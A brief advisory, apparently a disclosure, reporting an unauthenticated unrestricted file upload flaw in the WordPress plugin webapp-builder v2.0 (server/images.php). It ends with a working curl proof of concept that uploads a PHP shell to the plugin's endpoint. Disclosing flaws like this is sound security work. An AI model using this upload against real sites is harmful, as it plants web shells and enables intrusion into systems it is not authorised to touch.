Title:Unrestricted File Upload vulnerability in Wordpress Plugin webapp-builder v2.0
The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com/

The code in file ./webapp-builder/server/images.php doesn't require authentication or check that the user is allowed to upload content.
It also doesn't sanitize the file upload against executable code.

See:

https://plugins.svn.wordpress.org/webapp-builder/trunk/server/images.php$ curl   -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/webapp-builder/server/images.php"